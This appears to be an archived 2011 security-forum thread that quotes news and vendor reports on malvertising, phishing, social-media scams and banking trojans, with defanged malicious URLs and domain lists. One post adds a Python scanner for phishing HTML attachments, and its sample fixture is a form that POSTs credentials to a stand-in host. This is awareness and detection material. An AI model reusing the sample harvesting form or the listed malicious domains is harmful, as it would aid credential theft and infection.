SPAM frauds, fakes, and other MALWARE deliveries - archive

UK - malvertising attack ...

FYI...

UK - malvertising attack...
- http://www.theregister.co.uk/2011/02/28/tainted_ads_blight_uk_sites/
28 Feb. 2011 - "Several highly trafficked UK sites – including the website of the London Stock Exchange – served malware-tainted ads as the result of a breach of security by a third-party firm they shared in common. Surfers visiting auto-trading site Autotrader.co.uk and the cinema site Myvue.com were also exposed to the attack, which stemmed from a breach at their common ad provider, Unanimis, rather than at any of the three sites themselves. Unconfirmed reports suggest eBay.co.uk was also affected. The malicious ads made several concealed redirects before dropping surfers on a portal pimping rogue anti-virus (AKA scareware)... Websense** confirmed the attack on Monday, saying it had been tracking the progress of the attack over recent days..."
* http://www.highseverity.com/2011/02/london-stock-exchange-hit-by-malware.html

** http://community.websense.com/blogs...otrader-co-uk-infected-with-malvertizing.aspx

:mad::fear:
 
Morgan Stanley security breach...

FYI...

Morgan Stanley security breach...
- http://www.bloomberg.com/news/2011-...same-china-based-attacks-that-hit-google.html
2011-02-28 - "Morgan Stanley experienced a “very sensitive” break-in to its network by the same China-based hackers who attacked Google Inc.’s computers more than a year ago, according to leaked e-mails from a cyber-security company working for the bank. The e-mails from the Sacramento, California-based computer security firm HBGary Inc., which identify the first financial institution targeted in the series of attacks, said the bank considered details of the intrusion a closely guarded secret... The HBGary e-mails don’t indicate what information may have been stolen from Morgan Stanley’s databanks or which of the world’s largest merger adviser’s multinational operations were targeted... a spokeswoman for the New York-based bank, which unlike Google didn’t disclose the attacks publicly, declined to comment on them specifically... The hackers successfully implanted software designed to steal confidential files and internal communications, according to dozens of HBGary e-mails that detail efforts to plug the holes. One e-mail, dated June 19, said that the attackers may be the same ones who had hit a U.K.-based defense contractor and discusses hacking software called Monkif, which can be used by intruders to remotely orchestrate a sophisticated form of cyber attack known as an ‘advanced persistent threat’ or APT..."
- http://blog.damballa.com/?p=341

:fear::mad::fear:
 
"You have received a gift..." of malware ...

FYI...

"You have received a gift..." of malware...
- http://blog.mxlab.eu/2011/03/01/you...om-one-of-our-members-emails-lead-to-malware/
March 1, 2011 - "... new trojan distribution campaign by email with the subject “You have received a gift from one of our members !” The email is sent from the spoofed address “gifts@freeze.com”, while the SMTP from address is “_www@pictry.loc”... The URL in the email leads to hxxp:// www .i-tec .it/gift.pif and this malicious file is 844kB large... A Backdoor.IRCBot is installed, allowing a backdoor to be opened to the infected computer, combined with Trojan.RunKeys that will make sure that trojans are started up when the computer boots... malware will make a connection with a remote IRC server..."
(Screenshots and more detail available at the MXLabs URL above.)

- http://tools.cisco.com/security/cen...currentPage=1&sortOrder=d&pageNo=1&sortType=d

:fear::mad:
 
Twitter survey SCAM ...

FYI...

Twitter survey SCAM...
- http://nakedsecurity.sophos.com/2011/03/02/11-6-hours-survey-scam-spreads-like-wildfire-on-twitter/
March 2, 2011 - "A rogue application has caught Twitter users off their guard today, with thousands of people duped into clicking on links believing that it will reveal how many hours they have spent on Twitter... However, if you click on the bit.ly link being used in the message you are taken to a page which attempts to connect a rogue application called "Time on Tweeter" with your Twitter account. The application instantly tweets a message to your Twitter feed, claiming that you have also spent 11.6 hours on Twitter... spreading the link virally, and then directs you to a page which presents a revenue-generating survey on behalf of the scammers. Affected users should revoke the application's access to their Twitter account immediately..."
(Screenshots available at the Sophos URL above.)

:fear:
 
SWF embedded JavaScript

FYI...

SWF embedded JavaScript
- http://blogs.technet.com/b/mmpc/archive/2011/03/07/embedded-javascript-in-swf.aspx
7 Mar 2011 - "... Since the beginning of this year, 89% of the targets were in South Korea with 75% of them specifically in Seoul. Here’s a chart with a breakdown by unique machines in the months January and February of this year (there has been no activity in March):
- http://www.microsoft.com/security/portal/blog-images/JASWI-0b.jpg
Attack attempts by unique machines in the months January and February of 2011
... The malware Trojan:SWF/Jaswi.A is unlike other SWF malware; other SWF malware typically calls “getURL <website address>” within an ACTION tag in order to visit a malicious website link without user consent... Trojan:SWF/Jaswi.A contains an embedded malicious JavaScript that initiates a legal Windows API call to trigger the payload... the legal function ExternalInterface.call() has been made to complete a procedure of initiating JavaScript injection... Internet Explorer vulnerability CVE-2010-0806 has been abused! This particular exploit affects Microsoft Internet Explorer versions 6, 6+SP1 and 7, and could allow a remote attacker to execute arbitrary code... The file “uusee.exe” from the obfuscated URL shown above is actually a prevalent password stealer in China... the embedded JavaScript technique used in the malicious SWF... appears to be a trend and may become a popular method..."

:mad::fear:
 
Malvertisements - a plague...

FYI...

Malvertisements - a plague...
- http://threatpost.com/en_us/blogs/one-million-web-sites-infected-end-2010-030711
March 7, 2011 - "... The Dasient Q4 Malware Update* reported that more than one million Web sites were infected in the last quarter of 2010. That period saw a 25% growth in malicious advertisements from the previous quarter, as attackers found ways to sneak malicious code into widely used syndicated online ad networks. It's a trend that security experts see accelerating in 2011, as malicious advertisements, sometimes referred to as 'malvertisements,' crop up on high profile sites, said Neil Daswani, Chief Technology Officer at Dasient. Daswani said that, overall, his company saw a 100% increase in the amount of malicious advertising from the third- to fourth quarters, 2010. However, much of that was due to an expansion of the sites Dasient monitored, with an increasing focus on so-called 'remnant' ad networks, which aggregate 'remnant' advertisements from direct marketers, who often have little oversight about where the ads appear... In recent weeks, well-ranked sites such as Autotrader .co.uk, cinema site Myvue .com and londonstockexchange .com were reported to have served up malicious advertisements. Malicious ads are commonly used to display pop-up messages with links that will take users to a drive-by download Web site, download rogue anti-virus programs, or other threats..."
* http://blog.dasient.com/2011/03/dasient-q4-malware-update-significant.html

:fear::mad:
 
Virut malware spreads with warez ...

FYI...

Virut malware spreads with warez ...
- http://techblog.avira.com/2011/03/11/polymorphic-virut-malware/en/
March 11, 2011 - "W32/Virut.ce is one of the most widespread pieces of malware which can be found on infected computers. This file infector gets massively spread bundled with illegal software (warez). The virus is infecting executable files using the latest techniques, which make detecting and treating those files particularly difficult. In the current threat landscape we see more server-side polymorphic malware; infecting executable files is not as popular as a few years ago. During the last years emulation techniques have become better, which makes detection of polymorphic malware much easier. The authors of the virus weren’t put off by the difficulties they faced in trying to infect executable files. But W32/Virut.ce is not only infecting executable files, the virus also includes a backdoor using the IRC protocol. This allows attackers to download and run further malware from the Internet which can (as example) steal information. The server to which the malware connects is a pre-defined IRC server, the channel is called “virtu”..."
- http://techblog.avira.com/wp-content/uploads/2011/03/Analysis_W32.Virut_.ce_.pdf
(PDF, 1 MB)

:fear::mad:
 
FTC advisory - charity SCAMS

FYI...

FTC advisory - charity SCAMS
- http://www.ftc.gov/opa/2011/03/earthquake.shtm
03/14/2011 - "After the earthquake that rocked Japan’s northeast coast and triggered a widespread tsunami last week, the Federal Trade Commission is urging consumers to be cautious of potential charity scams... carefully consider urgent appeals for aid that (are received) in person, by phone or mail, by e-mail, on websites, or on social networking sites. The agency’s Charity Checklist* advises consumers about donating wisely to charities..."
* http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt114.shtm
___

- http://community.websense.com/blogs...cybercriminals-utilize-japanese-disaster.aspx
15 Mar 2011

:fear:
 
Phish targets BoA, PayPal...

FYI...

Phish targets BoA, PayPal...
- http://www.theregister.co.uk/2011/03/17/phishers_outgun_firefox_chrome/
17th March 2011 - "... phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email. According to M86 researcher Rodel Mendrez*, the locally stored file opens a web form that collects the customers' login credentials, credit card numbers and other sensitive information and then uses a POST request to zap them to a PHP application on a legitimate website that's been compromised. By avoiding the use of more verbose GET requests and known phishing sites, the scam flies completely under the radar of the browsers' fraud protection features..."
* http://labs.m86security.com/2011/03/phishing-scam-in-an-html-attachment/
March 15th, 2011 - "... Phishers... have found ways to circumvent this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser..."

:fear::spider:
 
Twitter SCAMS spreading fast

FYI...

Twitter SCAMS spreading fast
- http://nakedsecurity.sophos.com/201...book-users-profile-views-scam-spreading-fast/
March 17, 2011 - "... Thousands of Twitter users are falling once again for a scam that requires victims to grant access to a malicious application. Today's scam seems to be a continuance of a trend in which the scammers are adapting their ego-driven bogus Facebook apps to operate on Twitter... If you accept the application, not only will it post to your Twitter feed, it will also display an image with a random number that supposedly represents the number of people who have viewed your profile. Not surprisingly, the revenue generating opportunity for these scammers is a fake IQ test that suggests you could win a free iPad*... The advice remains the same as for Facebook. Be cautious of which games/apps you approve and carefully audit the authorization page to see if an app wants control of your account or permission to post..."
* http://sophosnews.files.wordpress.com/2011/03/twitterantispam500.png?w=500&h=244

:fear::fear:
 
SPAM/phish continues

FYI...

SPAM/phish continues...
- http://www.us-cert.gov/current/#ongoing_phishing_attack
March 18, 2011 - "... public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment. This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing the user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks; this method of attack is able to bypass this security mechanism..."
___

- http://tools.cisco.com/security/cen...currentPage=1&sortOrder=d&pageNo=1&sortType=d
March 18, 2011

:mad::fear:
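The two posts above (M86/The Register and US-CERT) describe the same trick: the credential form travels as an HTML attachment, so the browser never issues a GET to a blacklisted phishing URL, and the harvested fields leave via a POST to a script on a compromised site. A mail gateway can still catch this on the inbound side by looking inside HTML attachments for forms that collect sensitive fields and POST them to a remote host. The following is an added example, not code from either report or from US-CERT; the message, the attachment and the host name in it are constructed for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not a real capture): a spam message carrying an HTML
# attachment whose form POSTs credentials to a script on a third-party host.
SAMPLE_EML = b"""From: "Bank Notice" <notice@example.test>
To: victim@example.test
Subject: Please verify your account
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain

Please open the attached form to verify your account.

--XYZ
Content-Type: text/html; name="verify.html"
Content-Disposition: attachment; filename="verify.html"

<html><body>
<form method="POST" action="http://compromised-host.example/upload/login.php">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="text" name="cardnumber">
</form>
</body></html>
--XYZ--
"""

# Field-name fragments that indicate a form is after credentials or card data.
SENSITIVE_NAMES = ("pass", "pin", "card", "ssn", "cvv", "account")


class FormScanner(HTMLParser):
    """Collects every <form> with its action, method and input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").upper(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(((a.get("type") or "text").lower(),
                                            a.get("name") or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def credential_form_findings(html_text):
    """Return forms that send sensitive fields to an absolute remote URL."""
    scanner = FormScanner()
    scanner.feed(html_text)
    findings = []
    for form in scanner.forms:
        target = urlparse(form["action"])
        remote = target.scheme in ("http", "https") and bool(target.netloc)
        sensitive = any(t == "password" or any(k in n.lower() for k in SENSITIVE_NAMES)
                        for t, n in form["inputs"])
        if remote and sensitive:
            findings.append({"host": target.netloc, "method": form["method"],
                             "fields": [n for _, n in form["inputs"]]})
    return findings


def scan_message(raw_bytes):
    """Parse a raw RFC 822 message and flag HTML attachments with harvesting forms."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        for finding in credential_form_findings(part.get_content()):
            finding["attachment"] = part.get_filename()
            results.append(finding)
    return results
```

A gateway rule built on `scan_message` would quarantine or strip the attachment rather than rely on the browser's URL-based filter, which this delivery method never triggers.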
 
Fake Facebook email - Zbot and Black Hole Exploit Kit "all in one"

FYI...

Fake Facebook email - Zbot and Black Hole Exploit Kit "all in one"
- http://community.websense.com/blogs...xploit-kit-all-in-facebook-comments-spam.aspx
18 Mar 2011 - "Websense... has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to actually be originating from the Cutwail/Pushdo spam bot. This time round, the Cyber criminals employ two attack vectors: social engineering and an exploit kit. Both end up with the Zeus/Zbot Trojan installed on the targeted machines... The malicious email is spoofed to appear to be coming from Facebook.com and says: "Hi, someone loves your photo comments, please click on the link to see all comments". It provides a fake URL disguised as a formal Facebook link. Once clicked, the user is redirected to an attack page and is prompted to download and run an "update" from Facebook. The "update" file is a Zeus/Zbot Trojan variant. At the time of writing, the file had only a 7% detection*... The attack isn't over yet. While the fake Facebook page loads, the user's machine is attacked silently with several exploits in the background. The exploits are sent via an iframe contained in the fake Facebook attack page. This process happens silently when the attack page is loaded. The exploits are loaded from one of the most prevalent exploit kits today - the Blackhole exploit kit. -Any- successful exploitation results in the Zeus/Zbot Trojan installed silently on the user's machine..."
* http://www.virustotal.com/file-scan...89a703e1c7d1ded2ff956aee11d5a2c0f1-1300384459
File name: facebook.update.utility.exe.1
Submission date: 2011-03-17 17:54:19 (UTC)
Current status: finished
Result: 3/43 (7.0%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan...89a703e1c7d1ded2ff956aee11d5a2c0f1-1300478516
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-18 20:01:56 (UTC)
Result: 14/41 (34.1%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan...89a703e1c7d1ded2ff956aee11d5a2c0f1-1300555240
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-19 17:20:40 (UTC)
Result: 18/41 (43.9%)

:fear::mad::fear:
 
Tax SCAM season...

FYI...

Tax Season - phishing scams, malware campaigns
- http://www.us-cert.gov/current/#us_tax_season_phishing_scams1
March 16, 2011 - "... These phishing scams and malware campaigns may include, but are not limited to, the following:
* information that refers to a tax refund
* warnings about unreported or under-reported income
* offers to assist in filing for a refund
* details about fake e-file websites
These messages which may appear to be from the IRS, may ask users to submit personal information via email or may instruct the user to follow a link to a website that requests personal information or contains malicious code...
• Do not follow unsolicited web links in email messages.
• Maintain up-to-date antivirus software..."
- http://www.irs.gov/privacy/article/0,,id=179820,00.html?portlet=5

(More info and detail at both URL's above.)

:mad::fear:
 
Spotify users attacked by drive-by malware...

FYI...

Spotify users attacked by drive-by malware...
- http://news.netcraft.com/archives/2011/03/25/spotify-free-users-attacked-by-malware.html
25 March, 2011 - "Users of the Spotify Free music streaming software have been attacked by drive-by malware. At least one attack used a Java exploit to drop malicious executable code on a victim's computer, with AVG software identifying one of the malicious payloads as Trojan horse Generic_r.FZ. Another threat blocked by AVG was a Blackhole Exploit Kit hosted on the uev1 .co .cc domain. Several people have reported the problem to Spotify over the past 24 hours, and attacks are still being reported at the time of publication. It is believed that the attacks are being launched through malicious third-party adverts which are displayed in ad-supported versions of the Spotify software. By exploiting local software vulnerabilities, the attacker can then install malware on unprotected computers."

- http://community.websense.com/blogs...spotify-application-serves-malicious-ads.aspx
25 Mar 2011 - "... The first report we have of a malicious ad being displayed is from around 11:30 GMT on March 24... In this case the malicious ad is actually displayed inside of the Spotify application... The application will render the ad code and run it as if it were run inside a browser. This means that the Blackhole Exploit Kit works perfectly fine and it's enough that the ad is just displayed to you in Spotify to get infected, you don't even have to click on the ad itself. So if you had Spotify open but running in the background, listening to your favorite tunes, you could still get infected. Seems like free does come at a price after all. Spotify removed all 3rd party ads in the free version while they did their investigation but the ads have now been turned back on again. Once the ad was displayed, the computer would connect to hxxp: //uev1 .co .cc where the exploit kit tries several vulnerabilities to infect the user. The IP address where the malicious content is hosted is well-known to us and we have seen it host the same exploit kit on several other domains... One of the vulnerabilities the exploit kit uses is a vulnerability in Adobe Reader/Acrobat. The kit uses a heavily obfuscated PDF file to make the infected computer download the fake AV software. Here are the VirusTotal reports for the PDF and the fake AV file*. Once the fake AV is launched it connects to the following domains to download additional content, including a rootkit** which is a packed version of TDSS:
• tuartma .in, rappour .in, findstiff .org, searchcruel .org, findclear .org, replity .in, searchgrubby .org, demivee .in, ripplig .in..."
(Screenshots and more detail available at the URL above.)
* http://www.virustotal.com/file-scan...66d1cf9dccb7c2ea3da3d42fd090c97acf-1301413767
File name: L9FPB1.pdf
Submission date: 2011-03-29 15:49:27 (UTC)
Result: 12/43 (27.9%)

** http://www.virustotal.com/file-scan...708c931467ce80de3b8fbf8fb98370f261-1301086553
File name: spotify_dropped.exe
Submission date: 2011-03-25 20:55:53 (UTC)
Result: 4/43 (9.3%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan...708c931467ce80de3b8fbf8fb98370f261-1301408014
File name: f5dcd2415fa4b069c0b934baee109ea5
Submission date: 2011-03-29 14:13:34 (UTC)
Result: 21/41 (51.2%)

:mad::mad:
 
SPAM frauds, fakes, and other MALWARE deliveries...

FYI...

Twitter worm "Profile Spy"...
- http://www.theregister.co.uk/2011/04/05/twitter_worm/
5 April 2011 - "... a virally spreading worm that attempts to make money by scamming users into filling out surveys and viewing advertisements.
The rogue Twitter app is known as Profile Spy and gets installed by people who are tricked into believing it can tell them who has been viewing their online microposts. “Wow! See who viewed your twitter with Profile Spy,” the come-on reads. Those who click on the link are asked to allow the app to access and update their account data. Once they do so, they are presented with an unending series of popups for online surveys and ads promoting car insurance, long distance services and games, according to Errata Security CEO Rob Graham*, who blogged about the worm on Monday..."
* http://erratasec.blogspot.com/2011/04/anatomy-of-twitter-worm-profile-spy.html
April 04, 2011

:fear::mad:
 
SpyEye banking trojan - same as ZeuS...

FYI...

SpyEye banking trojan - same as ZeuS...
- http://www.theregister.co.uk/2011/04/05/spyeye_mobile_trojan/
5 April 2011 - "Cybercrooks have deployed a sophisticated man-in-the-mobile attack using the SpyEye banking Trojan toolkit. The Trojan, which infects Windows machines, displays additional content on a targeted European bank's webpage that requests prospective marks to input their mobile phone number and the IMEI of the device. The bank customer is informed the information is needed so that a new "digital certificate" can be sent to the phone... More information on the SpyEye-based mobile banking Trojan attack can be found in a blog post by F-Secure here*."
* http://www.f-secure.com/weblog/archives/00002135.html
April 4, 2011

:mad:
 
Internet Security Threat Report...

FYI...

Symantec Internet Security Threat Report...
- http://www.symantec.com/about/news/release/article.jsp?prid=20110404_03
April 5, 2011 – "Symantec... today announced the findings of its Internet Security Threat Report, Volume 16, which shows a massive threat volume of more than 286 million new threats last year, accompanied by several new megatrends in the threat landscape...
> 2010: The Year of the Targeted Attack...
> Social Networks: Fertile Ground for Cybercriminals...
> Attack Toolkits Focus on Java...
> Mobile Threat Landscape Comes Into View...
> Key Facts and Figures:
• 286 million new threats...
• 93 percent increase in Web-based attacks...
• 260,000 identities exposed per breach...
• 14 new zero-day vulnerabilities...
• 6,253 new vulnerabilities...
• 42 percent more mobile vulnerabilities...
• One botnet with more than a million spambots - Rustock..."
(More detail available at the URL above.)

:fear::mad:
 
Facebook "video" SCAMS ...

FYI...

Facebook "video" SCAMS...
- http://community.websense.com/blogs...-golf-course-video-quot-scam-on-facebook.aspx
9 Apr 2011 - "... scam making its way across Facebook linking to a video titled "The Hottest & Funniest Golf Course Video - LOL"... When clicking on the link you're taken to the following page, tricking you into not only liking the page but also sharing it with your friends. It's doing this by using standard Facebook APIs... After liking and sharing the page, and attempting to view the video, the user is taken to a typical CPA Survey scam so in the end there's no video at all... As always, if a video forces you to like, share, or install an app to view it, DON'T..."

:mad:
 
SPAM malicious e-mail msgs continue...

FYI...

Virus Outbreak in Progress...
- http://www.ironport.com/toc/

- http://tools.cisco.com/security/cen...currentPage=1&sortOrder=d&pageNo=1&sortType=d
Malicious PDF Attachment E-mail Messages - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22911
Fake Photograph Link E-mail Messages - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22924
Fake Parcel Delivery Notification E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22696
Fake Facebook Personal Message E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=20961
Malicious United Postal Svc Delivery Failure E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22769

Fake Scanned Document E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21429
Fake Facebook Password Reset Notification E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22907
Fake Official Letter E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22910
Fake UPS Shipment Arrival E-mail Messages - April 12, 2011 ...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22030

:fear:
 